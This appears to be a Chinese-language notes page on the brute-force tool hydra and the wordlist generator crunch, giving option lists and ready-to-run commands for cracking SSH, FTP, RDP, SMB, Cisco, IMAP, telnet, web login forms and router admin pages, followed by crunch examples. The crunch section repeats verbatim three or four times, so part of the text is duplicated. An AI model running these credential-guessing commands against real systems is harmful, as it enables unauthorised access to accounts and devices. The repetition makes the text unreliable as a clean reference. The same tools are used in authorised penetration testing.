hydra:據說也有圖形界面
看自身幫助絕對夠用,關鍵是字典
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 繼續從上一次進度接着破解。
-S 採用SSL鏈接。
-s PORT 可通過這個參數指定非默認端口。
-l LOGIN 指定破解的用戶,對特定用戶破解。
-L FILE 指定用戶名字典。
-p PASS 小寫,指定密碼破解,少用,一般是採用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。
-C FILE 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P參數。
-M FILE 指定目標列表文件一行一條。
-o FILE 指定結果輸出文件。
-f 在使用-M參數以後,找到第一對登錄名或者密碼的時候中止破解。
-t TASKS 同時運行的線程數,默認爲16。
-w TIME 設置最大超時的時間,單位秒,默認是30s。
-v / -V 顯示詳細過程。
server 目標ip
service 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可選項
1、破解ssh:hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
2、破解ftp:hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
3、get方式提交,破解web登錄:hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交,破解web登錄:hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存爲out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是採用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。)
5、破解https:hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
7、破解cisco:hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
破解telnet
hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V
破解路由器密碼:
hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 爲嘗試破解的用戶名。
-x 6:10:1a. 表示枚舉的密碼由 數字、小寫字母和單字符’.'等等組成,長度爲 6 - 10 位。
-t 8 表示分 8 個並行任務進行爆破嘗試。
192.168.1.1 爲 Router 地址。
http-get 爲破解方式(協議)
/ 爲頁面地址(根)
批量破解:
hydra -L user.txt -P passwd.txt -M ip1003.txt ftp
字典生成個工具簡介:
Crunch
crunch
crunch version 3.6
Crunch can create a wordlist based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
charset string
參數
-b number[type] 體積大小,比如-b 20mb
-c number 密碼行數,比如-c 8000
-d number symbol 限制出現相同元素的個數(至少出現元素個數),-d 3就不會出現zzf ffffgggg之類的
-e sting 定義停止生成密碼。比如 -e 222222:到222222停止生成密碼
-f /path/to/charset.lst charset-name 比如:調用密碼庫文件,比如/usr/share/crunch/charset.lst
-i 改變輸出格式
-l 與-t同時使用。
-m 與-t搭配使用
-o wordlist.txt 保存爲
-p 定義密碼元素
-q filename.txt讀取字典
-r #定義從某一個地方重新開始
-s #第一個密碼,從xxx開始
-t #定義輸出格式
@代表小寫字母
,代表大寫字母
%代表數字
^代表符號
\代表空格
-z 打包壓縮,格式支持 gzip, bzip2, lzma, 7z
舉例
crunch 1 8
#生成最小1位,最大8位,由26個小寫字母爲元素的所有組合
crunch 1 6 abcdefg
#生成最小1位,最大爲6位.由abcdefg爲元素的所有組合。
crunch 1 6 abdcefg
#生成 最小爲1,最大爲6.由abcdefg和空格爲元素的所有組合(/代表空格)
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
#調用密碼庫 charset.lst, 生成最小爲1,最大爲8,元素爲密碼庫 charset.lst中 mixalpha-numeric-all-space的項目,並保存爲 wordlist.txt;其中 charset.lst在kali_linux的目錄爲 /usr/share/crunch/charset.lst, charset.lst中 mixalpha-numeric-all-space項目包含最常見的元素組合(即大小寫字母+數字+常見符號),想了解更多可以cat /usr/share/crunch/charset.lst 查看所有密碼庫
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog @@@ -s cbdogaaa
#調用密碼庫 charset.lst,生成8位密碼;其中元素爲 密碼庫 charset.lst中 mixalpha-numeric-all-space的項;格式爲“兩個小寫字母+dog+三個小寫字母”,並以cbdogaaa開始枚舉(@代表小寫字母)
crunch 2 3 -f charset.lst ualpha -s BB
#調用密碼庫charset.lst,生成2位和3位密碼;其中元素爲密碼庫charset.lst中ualpha的項;並且以BB開頭
crunch 4 5 -p abc
#crunch將會生成abc, acb, bac, bca, cab, cba,雖然數字4和5這裏沒用,但必須有
crunch 4 5 -p dog cat bird
#crunch將生成以“dog”“cat”“bird”爲元素的所有密碼組合:birdcatdog,birddog-cat,catbirddog, catdogbird, dogbirdcat, dogcatbird
crunch 4 5 -b 20mib -o START
#生成最小爲4位,最大爲5位元素爲所有小寫字母的密碼字典,並以20M進行分割;這時會生成4個文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三個大概每個20M,最後一個10M左右(因爲總共70M)
crunch 3 3 abc + 123 @#! -t @%^
#生成3位密碼,其中第一位由“a,b,c”中的一個;第二位爲“1,2,3”中的一個;第三位爲“!,@,#”中的一個。比如1a! 2a# 3b@ ……
crunch 5 5 -t ddd@@ -p dog cat bird
#生成5個元素組成的密碼,其中前三個爲 dog cat bird任意組合,後兩個爲兩個小寫字母的任意組合。比如birddogcatuz catdogbirdab birdcatdogff ……
crunch 8 8 -d 2@
#生成8位密碼,每個密碼至少出現兩種字母
crunch 8 9 1234567890 -o /root/21324123/
crunch 9 9 -t icephone%%%% > /path/temple_dic
參數
-b number[type] 體積大小,比如-b 20mb
-c number 密碼行數,比如-c 8000
-d number symbol 限制出現相同元素的個數(至少出現元素個數),-d 3就不會出現zzf ffffgggg之類的
-e sting 定義停止生成密碼。比如 -e 222222:到222222停止生成密碼
-f /path/to/charset.lst charset-name 比如:調用密碼庫文件,比如/usr/share/crunch/charset.lst
-i 改變輸出格式
-l 與-t同時使用。
-m 與-t搭配使用
-o wordlist.txt 保存爲
-p 定義密碼元素
-q filename.txt讀取字典
-r #定義從某一個地方重新開始
-s #第一個密碼,從xxx開始
-t #定義輸出格式
@代表小寫字母
,代表大寫字母
%代表數字
^代表符號
\代表空格
-z 打包壓縮,格式支持 gzip, bzip2, lzma, 7z
舉例
crunch 1 8
#生成最小1位,最大8位,由26個小寫字母爲元素的所有組合
crunch 1 6 abcdefg
#生成最小1位,最大爲6位.由abcdefg爲元素的所有組合。
crunch 1 6 abdcefg
#生成 最小爲1,最大爲6.由abcdefg和空格爲元素的所有組合(/代表空格)
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
#調用密碼庫 charset.lst, 生成最小爲1,最大爲8,元素爲密碼庫 charset.lst中 mixalpha-numeric-all-space的項目,並保存爲 wordlist.txt;其中 charset.lst在kali_linux的目錄爲 /usr/share/crunch/charset.lst, charset.lst中 mixalpha-numeric-all-space項目包含最常見的元素組合(即大小寫字母+數字+常見符號),想了解更多可以cat /usr/share/crunch/charset.lst 查看所有密碼庫
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog @@@ -s cbdogaaa
#調用密碼庫 charset.lst,生成8位密碼;其中元素爲 密碼庫 charset.lst中 mixalpha-numeric-all-space的項;格式爲“兩個小寫字母+dog+三個小寫字母”,並以cbdogaaa開始枚舉(@代表小寫字母)
crunch 2 3 -f charset.lst ualpha -s BB
#調用密碼庫charset.lst,生成2位和3位密碼;其中元素爲密碼庫charset.lst中ualpha的項;並且以BB開頭
crunch 4 5 -p abc
#crunch將會生成abc, acb, bac, bca, cab, cba,雖然數字4和5這裏沒用,但必須有
crunch 4 5 -p dog cat bird
#crunch將生成以“dog”“cat”“bird”爲元素的所有密碼組合:birdcatdog,birddog-cat,catbirddog, catdogbird, dogbirdcat, dogcatbird
crunch 4 5 -b 20mib -o START
#生成最小爲4位,最大爲5位元素爲所有小寫字母的密碼字典,並以20M進行分割;這時會生成4個文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三個大概每個20M,最後一個10M左右(因爲總共70M)
crunch 3 3 abc + 123 @#! -t @%^
#生成3位密碼,其中第一位由“a,b,c”中的一個;第二位爲“1,2,3”中的一個;第三位爲“!,@,#”中的一個。比如1a! 2a# 3b@ ……
crunch 5 5 -t ddd@@ -p dog cat bird
#生成5個元素組成的密碼,其中前三個爲 dog cat bird任意組合,後兩個爲兩個小寫字母的任意組合。比如birddogcatuz catdogbirdab birdcatdogff ……
crunch 8 8 -d 2@
#生成8位密碼,每個密碼至少出現兩種字母
crunch 8 9 1234567890 -o /root/21324123/
crunch 9 9 -t icephone%%%% > /path/temple_dic
charset string
參數
-b number[type] 體積大小,比如-b 20mb
-c number 密碼行數,比如-c 8000
-d number symbol 限制出現相同元素的個數(至少出現元素個數),-d 3就不會出現zzf ffffgggg之類的
-e sting 定義停止生成密碼。比如 -e 222222:到222222停止生成密碼
-f /path/to/charset.lst charset-name 比如:調用密碼庫文件,比如/usr/share/crunch/charset.lst
-i 改變輸出格式
-l 與-t同時使用。
-m 與-t搭配使用
-o wordlist.txt 保存爲
-p 定義密碼元素
-q filename.txt讀取字典
-r #定義從某一個地方重新開始
-s #第一個密碼,從xxx開始
-t #定義輸出格式
@代表小寫字母
,代表大寫字母
%代表數字
^代表符號
\代表空格
-z 打包壓縮,格式支持 gzip, bzip2, lzma, 7z
舉例
crunch 1 8
#生成最小1位,最大8位,由26個小寫字母爲元素的所有組合
crunch 1 6 abcdefg
#生成最小1位,最大爲6位.由abcdefg爲元素的所有組合。
crunch 1 6 abdcefg
#生成 最小爲1,最大爲6.由abcdefg和空格爲元素的所有組合(/代表空格)
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
#調用密碼庫 charset.lst, 生成最小爲1,最大爲8,元素爲密碼庫 charset.lst中 mixalpha-numeric-all-space的項目,並保存爲 wordlist.txt;其中 charset.lst在kali_linux的目錄爲 /usr/share/crunch/charset.lst, charset.lst中 mixalpha-numeric-all-space項目包含最常見的元素組合(即大小寫字母+數字+常見符號),想了解更多可以cat /usr/share/crunch/charset.lst 查看所有密碼庫
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog @@@ -s cbdogaaa
#調用密碼庫 charset.lst,生成8位密碼;其中元素爲 密碼庫 charset.lst中 mixalpha-numeric-all-space的項;格式爲“兩個小寫字母+dog+三個小寫字母”,並以cbdogaaa開始枚舉(@代表小寫字母)
crunch 2 3 -f charset.lst ualpha -s BB
#調用密碼庫charset.lst,生成2位和3位密碼;其中元素爲密碼庫charset.lst中ualpha的項;並且以BB開頭
crunch 4 5 -p abc
#crunch將會生成abc, acb, bac, bca, cab, cba,雖然數字4和5這裏沒用,但必須有
crunch 4 5 -p dog cat bird
#crunch將生成以“dog”“cat”“bird”爲元素的所有密碼組合:birdcatdog,birddog-cat,catbirddog, catdogbird, dogbirdcat, dogcatbird
crunch 4 5 -b 20mib -o START
#生成最小爲4位,最大爲5位元素爲所有小寫字母的密碼字典,並以20M進行分割;這時會生成4個文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三個大概每個20M,最後一個10M左右(因爲總共70M)
crunch 3 3 abc + 123 @#! -t @%^
#生成3位密碼,其中第一位由“a,b,c”中的一個;第二位爲“1,2,3”中的一個;第三位爲“!,@,#”中的一個。比如1a! 2a# 3b@ ……
crunch 5 5 -t ddd@@ -p dog cat bird
#生成5個元素組成的密碼,其中前三個爲 dog cat bird任意組合,後兩個爲兩個小寫字母的任意組合。比如birddogcatuz catdogbirdab birdcatdogff ……
crunch 8 8 -d 2@
#生成8位密碼,每個密碼至少出現兩種字母
crunch 8 9 1234567890 -o /root/21324123/
crunch 9 9 -t icephone%%%% > /path/temple_dic
charset string
參數
-b number[type] 體積大小,比如-b 20mb
-c number 密碼行數,比如-c 8000
-d number symbol 限制出現相同元素的個數(至少出現元素個數),-d 3就不會出現zzf ffffgggg之類的
-e sting 定義停止生成密碼。比如 -e 222222:到222222停止生成密碼
-f /path/to/charset.lst charset-name 比如:調用密碼庫文件,比如/usr/share/crunch/charset.lst
-i 改變輸出格式
-l 與-t同時使用。
-m 與-t搭配使用
-o wordlist.txt 保存爲
-p 定義密碼元素
-q filename.txt讀取字典
-r #定義從某一個地方重新開始
-s #第一個密碼,從xxx開始
-t #定義輸出格式
@代表小寫字母
,代表大寫字母
%代表數字
^代表符號
\代表空格
-z 打包壓縮,格式支持 gzip, bzip2, lzma, 7z
舉例
crunch 1 8
#生成最小1位,最大8位,由26個小寫字母爲元素的所有組合
crunch 1 6 abcdefg
#生成最小1位,最大爲6位.由abcdefg爲元素的所有組合。
crunch 1 6 abdcefg
#生成 最小爲1,最大爲6.由abcdefg和空格爲元素的所有組合(/代表空格)
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
#調用密碼庫 charset.lst, 生成最小爲1,最大爲8,元素爲密碼庫 charset.lst中 mixalpha-numeric-all-space的項目,並保存爲 wordlist.txt;其中 charset.lst在kali_linux的目錄爲 /usr/share/crunch/charset.lst, charset.lst中 mixalpha-numeric-all-space項目包含最常見的元素組合(即大小寫字母+數字+常見符號),想了解更多可以cat /usr/share/crunch/charset.lst 查看所有密碼庫
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog @@@ -s cbdogaaa
#調用密碼庫 charset.lst,生成8位密碼;其中元素爲 密碼庫 charset.lst中 mixalpha-numeric-all-space的項;格式爲“兩個小寫字母+dog+三個小寫字母”,並以cbdogaaa開始枚舉(@代表小寫字母)
crunch 2 3 -f charset.lst ualpha -s BB
#調用密碼庫charset.lst,生成2位和3位密碼;其中元素爲密碼庫charset.lst中ualpha的項;並且以BB開頭
crunch 4 5 -p abc
#crunch將會生成abc, acb, bac, bca, cab, cba,雖然數字4和5這裏沒用,但必須有
crunch 4 5 -p dog cat bird
#crunch將生成以“dog”“cat”“bird”爲元素的所有密碼組合:birdcatdog,birddog-cat,catbirddog, catdogbird, dogbirdcat, dogcatbird
crunch 4 5 -b 20mib -o START
#生成最小爲4位,最大爲5位元素爲所有小寫字母的密碼字典,並以20M進行分割;這時會生成4個文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三個大概每個20M,最後一個10M左右(因爲總共70M)
crunch 3 3 abc + 123 @#! -t @%^
#生成3位密碼,其中第一位由“a,b,c”中的一個;第二位爲“1,2,3”中的一個;第三位爲“!,@,#”中的一個。比如1a! 2a# 3b@ ……
crunch 5 5 -t ddd@@ -p dog cat bird
#生成5個元素組成的密碼,其中前三個爲 dog cat bird任意組合,後兩個爲兩個小寫字母的任意組合。比如birddogcatuz catdogbirdab birdcatdogff ……
crunch 8 8 -d 2@
#生成8位密碼,每個密碼至少出現兩種字母
crunch 8 9 1234567890 -o /root/21324123/
crunch 9 9 -t icephone%%%% > /path/temple_dic